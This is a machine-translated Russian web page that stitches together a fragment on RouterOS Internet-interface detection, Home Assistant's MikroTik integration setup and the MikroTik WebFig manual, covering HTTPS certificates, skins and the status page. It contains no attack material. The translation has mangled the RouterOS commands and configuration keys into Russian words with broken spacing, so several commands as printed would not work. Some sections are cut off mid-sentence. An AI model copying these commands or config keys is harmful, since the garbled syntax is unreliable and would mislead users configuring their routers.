Примечание. Интерфейсы LAN блокируются для LAN через 1 час, а затем изменяются только при изменении статуса соединения.

Интернет

интерфейсов WAN, которые могут подключаться к cloud.mikrotik.com, использующий протокол UDP, порт 30000 может получить это состояние. Доступность проверяется каждую минуту. Если облако не достигается в течение 3 минут, состояние возвращается к WAN.

Конфигурация

Подменю: / обнаружение интерфейса-Интернет

Объект Описание
detect-interface-list ( interface-list ; по умолчанию: нет ) Все интерфейсы в списке будут контролироваться программой Detect Internet
список интернет-интерфейсов (список интерфейсов ; по умолчанию: нет ) Интерфейсы с состоянием Интернет будут динамически добавлены в этот список
список интерфейсов LAN (список интерфейсов ; по умолчанию: нет ) Интерфейсы с состоянием Lan будут динамически добавлены в этот список
список интерфейсов wan (список интерфейсов ; по умолчанию: нет ) Интерфейсы с состоянием Wan будут динамически добавлены в этот список

Государство

Подменю: / обнаружение интерфейса - состояние интернета

В этом подменю отображается состояние всех контролируемых интерфейсов, определенных параметром detect-interface-list .

.

Mikrotik — Домашний помощник


Платформа mikrotik предлагает обнаружение присутствия путем просмотра подключенных устройств к маршрутизатору на базе MikroTik RouterOS.

В настоящее время Home Assistant поддерживает следующие типы устройств:

Настройка микротик хаб

Для использования этой платформы необходимо разрешить доступ к API RouterOS на маршрутизаторе.

Терминал:

  / ip сервис
установить api disabled = no port = 8728
  

Веб-интерфейс:

Перейдите к IP -> Services -> API и включите его.

Убедитесь, что порт 8728 или выбранный вами порт доступен из вашей сети.

Home Assistant предлагает интеграцию MikroTik через Configuration -> Integrations -> MikroTik .
Он также позволяет импортировать из файла configuration.yaml :

  # Пример записи configuration.yaml
микротик:
  - название: Микротик
    хост: IP_ADDRESS
    имя пользователя: ROUTEROS_USERNAME
    пароль: ROUTEROS_PASSWORD
  

Переменные конфигурации

имя строка Обязательно, по умолчанию: Mikrotik

Имя вашего устройства MikroTik.

IP-адрес вашего устройства MikroTik.

Имя пользователя на устройстве MikroTik.

Пароль данной учетной записи пользователя на устройстве MikroTik.

Порт API RouterOS.

По умолчанию:

8728 (или 8729, если SSL включен)

verify_ssl boolean (Необязательно, по умолчанию: false)

Используйте SSL для подключения к API.

arp_ping логический (Необязательно, по умолчанию: false)

Используйте ARP ping с методом DHCP для сканирования устройства.

force_dhcp boolean (Необязательно, по умолчанию: false)

Принудительно использовать список DHCP-серверов для отслеживаемых устройств.

Detection_time целое число (необязательно, по умолчанию: 300)

Время, прошедшее с момента последнего посещения до того, как устройство будет удалено, указывается в секундах.

Используйте сертификат

Для использования SSL для подключения к API (через api-ssl вместо службы api ) требуется дополнительная настройка на стороне RouterOS. Вам необходимо загрузить или сгенерировать сертификат и настроить службу api-ssl для его использования.Вот пример самозаверяющего сертификата:

  / certificate add common-name = "Самоподписанный демонстрационный сертификат для API" days-valid = 3650 name = "Самоподписанный демонстрационный сертификат для API" key-usage = digital-signature, key-encryption, tls-server, key- сертификат-знак, crl-знак
/ certificate sign "Самоподписанный демонстрационный сертификат для API"
/ ip service set api-ssl certificate = "Самоподписанный демонстрационный сертификат для API"
/ ip service включить api-ssl
  

Затем добавьте verify_ssl: true в запись устройства отслеживания mikrotik в вашей конфигурации .yaml файл.

Если все работает нормально, вы можете отключить чистую службу api в RouterOS:

  / ip service disable api
  

Права пользователя в RouterOS

Чтобы использовать этот трекер устройств, вам нужны только ограниченные права. Чтобы повысить безопасность вашего устройства MikroTik, создайте пользователя «только для чтения», который может подключаться к API и выполнять только ping-тест:

  / группа пользователей add name = homeassistant policy = read, api,! Local,! Telnet,! Ssh,! Ftp,! Reboot,! Write,! Policy, test,! Winbox,! Password,! Web,! Sniff, ! чувствительный,! romon,! чувак,! tikapp
/ пользователь добавить группу = домашний помощник имя = домашний помощник
/ user set password = "YOUR_PASSWORD" домашний помощник
  

Использование дополнительной конфигурации для записи mikrotik в вашей конфигурации.yaml файл

  микротик:
  - хост: 192.168.88.1
    имя пользователя: homeassistant
    пароль: ВАШ ПАРОЛЬ
    verify_ssl: true
    arp_ping: true
    force_dhcp: true
    обнаружение_время: 30
  

.Руководство по

: Webfig — MikroTik Wiki

Сводка

WebFig — это веб-утилита RouterOS, которая позволяет контролировать, настраивать и устранять неполадки маршрутизатора. Он разработан как альтернатива WinBox, оба имеют схожую компоновку и имеют доступ практически ко всем функциям RouterOS.

WebFig доступен непосредственно с маршрутизатора, что означает, что нет необходимости устанавливать дополнительное программное обеспечение (за исключением, конечно, веб-браузера с поддержкой JavaScript).

Поскольку Webfig не зависит от платформы, его можно использовать для настройки маршрутизатора непосредственно с различных мобильных устройств без необходимости разработки программного обеспечения для конкретной платформы.

Некоторые задачи, которые можно выполнять с помощью WebFig:

  • Конфигурация — просмотр и редактирование текущей конфигурации;
  • Monitoring — отображение текущего состояния маршрутизатора, информации о маршрутизации, статистики интерфейса, журналов и многого другого;
  • Устранение неполадок — RouterOS имеет множество инструментов для устранения неполадок (таких как ping, traceroute, анализаторы пакетов, генераторы трафика и многие другие), и все они могут использоваться с WebFig.

Подключение к маршрутизатору

WebFig можно запустить с домашней страницы маршрутизатора, доступ к которой можно получить, введя IP-адрес маршрутизатора в браузере.После успешной загрузки домашней страницы выберите webfig из списка доступных значков, как показано на снимке экрана.

После щелчка по значку webfig в окне входа в систему будет предложено ввести имя пользователя и пароль. Введите данные для входа и нажмите «Подключиться».

Теперь вы должны увидеть webfig в действии.

Подключение IPv6

Служба http

RouterOS теперь также прослушивает IPv6-адрес. Чтобы подключиться к IPv6, введите в браузере адрес ipv6 в квадратных скобках, например [2001: db8: 1 :: 4] .Если требуется подключение для привязки локального адреса, не забудьте указать имя интерфейса или идентификатор интерфейса в окнах, например [fe80 :: 9f94: 9396% ether1] .

Включение HTTPS

Для правильной работы HTTPS необходимо указать действующий сертификат, который может использовать Webfig. Вы можете использовать сертификат, выпущенный доверенным центром сертификации (CA), или вы можете создать свой собственный корневой CA и генерировать самозаверяющие сертификаты.

Примечание. Webfig поддерживает групповые сертификаты.Вы можете создать такой сертификат, указав подстановочный знак в свойстве common-name , например common-name = *. Mikrotik.com

Чтобы сгенерировать свои собственные сертификаты и включить доступ HTTPS, вы должны сначала войти в маршрутизатор с помощью Webfig (версия HTTP или вы можете использовать Winbox, SSH или Telnet), откройте новый терминал и введите следующие команды:

  • Создайте собственный корневой ЦС на маршрутизаторе
/ сертификат
добавить имя = LocalCA common-name = LocalCA key-usage = key-cert-sign, crl-sign
 
  • Подпишите вновь созданный сертификат CA
/ сертификат
подписать LocalCA
 

Примечание: Если вы уже настроили собственный центр сертификации или используете службу, которая подписывает сертификаты для вас, вы создаете и подписываете сертификат удаленно, а позже импортируете сертификат на маршрутизатор.Если вы импортируете сертификат, убедитесь, что вы отметили его как надежный.

  • Создать новый сертификат для Webfig (не корневой сертификат)
/ сертификат
добавить имя = Webfig common-name = 192.168.88.1
 

Примечание: Большинство браузеров выдают ошибку неверного сертификата, если общее имя сертификата не совпадает с адресом, который вы посещаете, по этой причине вы можете указать IP-адрес маршрутизатора как общее имя, поскольку вы будете использовать IP-адрес для открытия Webfig.Если у вас есть действительное DNS-имя для IP-адреса вашего устройства, вы можете использовать его в качестве обычного имени.

  • Подпишите новый сертификат для Webfig
/ сертификат
подписать Webfig ca = LocalCA
 

Примечание: Нет необходимости устанавливать сертификат как доверенный, если вы создали свой собственный корневой ЦС на том же маршрутизаторе, поскольку по умолчанию RouterOS будет доверять своему собственному сгенерированному корневому ЦС и, следовательно, будет доверять всем сертификатам, подписанным им, включая новый создан сертификат для Webfig.

  • Включите www-ssl и укажите, чтобы использовать вновь созданный сертификат для Webfig
/ ip сервис
установить www-ssl certificate = Webfig disabled = no
 

Теперь вы можете посетить https://192.168.88.1 и безопасно настроить свой маршрутизатор.

Примечание: По умолчанию браузеры не доверяют самозаверяющим сертификатам, вам нужно будет добавить сертификат как надежный при первом посещении страницы в браузере. Другой подход — экспортировать сертификат корневого ЦС и импортировать его в качестве доверенного корневого сертификата на ваш компьютер. Таким образом, все сертификаты, подписанные этим маршрутизатором, будут считаться действительными, что упростит управление сертификатами в вашей сети.

Примечание: Большинство интернет-браузеров имеют свою собственную цепочку доверия сертификатов и работают независимо от цепочки доверия сертификатов операционной системы, это означает, что вам, возможно, придется добавить сертификат вашего собственного корневого ЦС в качестве доверенного сертификата в настройках вашего браузера, поскольку доверяете сертификату в настройках вашей операционной системы может не иметь никакого эффекта при использовании вашего интернет-браузера.

Обзор интерфейса

Интерфейс

WebFig разработан, чтобы быть очень интуитивно понятным, особенно для пользователей WinBox.Он имеет очень похожий макет: строка меню слева, отмена / повтор вверху и работа в остальном доступном пространстве.

При подключении к маршрутизатору в строке заголовка браузера (имя вкладки в Chrome) отображается открытое в данный момент меню, имя пользователя, используемое для аутентификации, IP-адрес, идентификатор системы, версия ROS и модель RouterBOARD в следующем формате:

[меню] в [имя пользователя] @ [IP-адрес маршрутизатора] ([RouterID]) - Webfig [версия ROS] на [модель RB] ([платформа])
 

Панель меню имеет почти такой же дизайн, что и строка меню WinBox.Маленькая стрелка справа от пункта меню указывает, что в этом меню есть несколько подменю.

При щелчке по такому пункту меню будут перечислены подменю, а стрелка будет указывать вниз, показывая, что перечислены подменю.

Вверху вы можете увидеть три общие кнопки Undo / Redo, похожие на winbox, и одну дополнительную кнопку Log Out . В правом верхнем углу вы можете увидеть логотип WebFig и название модели RouterBOARDS.

Рабочая область имеет дизайн вкладок, где вы можете переключаться между несколькими вкладками конфигурации, например, на снимке экрана перечислены все вкладки, доступные в меню моста (мост, порты, фильтры, NAT, правила).

Под вкладками перечислены кнопки для всех команд меню, например, Добавить новый и Настройки .

Последняя часть — это таблица всех пунктов меню. В первом столбце элемента есть командные кнопки для конкретного элемента:

  • — включить текущий элемент
  • — отключить текущий элемент
  • — удалить текущий элемент

Конфигурация элемента

При нажатии на один из перечисленных элементов webfig откроет новую страницу, на которой будут показаны все настраиваемые параметры, команды, относящиеся к конкретным элементам, и статус.

Вверху вы можете увидеть тип и название позиции. На скриншоте примера вы можете видеть, что это элемент , интерфейс с именем , обход

Также имеются командные кнопки для конкретных элементов (ОК, Отмена, Применить, Удалить и Гореть). Они могут отличаться для разных предметов. Например Torch доступен только для интерфейсов.

Кнопки обычных предметов:

  • Ok — применить изменения к параметрам и выйти;
  • Отмена — выйти и не применять изменения;
  • Применить — применить изменения и остаться на текущей странице;
  • Удалить — удалить текущий элемент.

Строка состояния, аналогичная winbox, показывает текущий статус конкретных флагов элемента (например, запущенный флаг). Серый флаг означает, что он неактивен. В примере снимка экрана вы можете видеть, что , работающий под , сплошным черным цветом, а подчиненный — серым, что означает, что интерфейс работает, а не подчиненный интерфейс.

Список свойств разделен на несколько разделов, например «Общие», «STP», «Статус», «Трафик». В winbox эти разделы расположены на отдельных вкладках, но webfig перечисляет их все на одной странице с указанием имени раздела.На скриншоте вы видите раздел «Общие». Свойства, выделенные серым цветом, означают, что они доступны только для чтения, и настройка невозможна.

Работа с файлами

Webfig позволяет загружать файлы прямо на маршрутизатор, без использования FTP-сервисов.
Чтобы загрузить файлы, откройте меню Files , нажмите кнопку Choose File , выберите файл и дождитесь загрузки файла.

Файлы также можно легко загрузить с маршрутизатора, нажав кнопку «Загрузить» справа от записи файла.

Мониторинг трафика

Шаблон: TODO

[Вверх | К содержанию ]

Скины

Webfig skins — удобный инструмент, делающий интерфейс более удобным. Это не средство безопасности. Если у пользователя есть достаточные права, он может получить доступ к скрытым функциям другими способами.

Проектирование скинов

Если у пользователя достаточно прав (группа имеет права на редактирование политики) Design Skin становится доступной.Нажатие этой кнопки-переключателя откроет параметры редактирования интерфейса. Возможные операции:

  • Скрыть меню — скроет все пункты меню и его подменю;
  • Скрыть подменю — будут скрыты только определенные подменю
  • Скрыть вкладки — если детали подменю имеют несколько вкладок, их можно скрыть таким образом;
  • Переименовать меню, элементы — сделать некоторые функции более очевидными или перевести их в свой язык;
  • Добавить примечание к элементу (в подробном виде) — добавить комментарий к поданному;
  • Сделать элемент доступным только для чтения (в подробном виде) — для безопасности пользователя можно сделать очень чувствительные поля только для чтения
  • Скрыть флаги (в подробном просмотре) — хотя скрыть флаг можно только в подробном просмотре, этот флаг не будет отображаться в виде списка и в подробном просмотре;
  • Добавить ограничения для поля — (в подробном представлении), где это список значений времени, разделенных запятыми или новой строкой, список допустимых значений:
    • интервал номеров ‘.. ‘ пример: 1..10 допускает значения от 1 до 10 для полей с числами, например, размер MTU.
    • Префикс поля

    • (текстовые поля, MAC-адрес, поля настроек, поля со списком). Если требуется ограничить длину префикса $ нужно добавить в конец, например, ограничение беспроводного интерфейса только «станцией» будет содержать
  • Добавить Вкладка — добавит серую ленту с редактируемой меткой, которая будет разделять поля. Лента будет добавлена ​​перед полем, в которое она будет добавлена;
  • Добавить Разделитель — добавит горизонтальный разделитель низкой высоты перед полем, в которое он добавлен.

Примечание: Интервал номеров не может быть установлен для расширения ограничений, установленных RouterOS для этого поля

Примечание: Набор полей — это аргумент, состоящий из набора флажков, например, настройка политик для групп пользователей, RADIUS «Сервис»

Примечание: Ограничения, установленные для полей со списком, будут значениями, выбираемыми из раскрывающегося списка

Настроить беспроводной интерфейс

Для настройки

Страница состояния

Примечание: Запуск RouterOS 5.Интерфейс webfig 7 добавляет возможность пользователям создавать страницу состояния, где можно добавлять и упорядочивать поля из любого места.

Страница

Satus может быть создана пользователями (с достаточными правами), а порядок полей на странице может быть изменен.

Когда создается страница состояния, это страница по умолчанию, которая открывается при входе в маршрутизатор через интерфейс webfig.

Добавление полей

Чтобы добавить поле на страницу статуса, пользователь должен войти в режим «Дизайн обложки» и из выпадающего меню в поле выбрать опцию — «Добавить на страницу статуса».

В результате этого действия нужное поле в режиме только для чтения будет добавлено на страницу статуса.Если в данный момент страница статуса отсутствует, она будет создана для пользователя автоматически.

Две колонны

Поля на странице Статус можно расположить в два столбца. Столбцы заполняются сверху вниз.

Если у вас есть только один столбец, то первый элемент, предназначенный для второго, следует перетащить в верх первого элемента, когда черная линия появится поверх первого элемента, затем перетащите мышь влево, пока не отобразится более короткая черная линия, как показано на Скриншот.При отпускании кнопки мыши создается второй столбец. Остальные поля после этого можно перетащить так же, как и в случае дизайна с одним столбцом.

Примеры оформления скинов
Установить поле

Пределы настройки для поля настройки

И результат:

Использование скинов

Чтобы использовать скины, вам необходимо назначить скин для группы, когда это будет сделано, пользователи этой группы будут автоматически использовать выбранный скин по умолчанию при входе в Webfig.

Примечание: Webfig — это только интерфейс конфигурации, который может использовать скины

Если необходимо использовать созданный скин на другом маршрутизаторе, вы можете скопировать файлы в папку skins на другом маршрутизаторе.На новом роутере необходимо добавить скопированный скин в группу пользователей, чтобы использовать его.

[ Вверх | К содержанию ]

.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *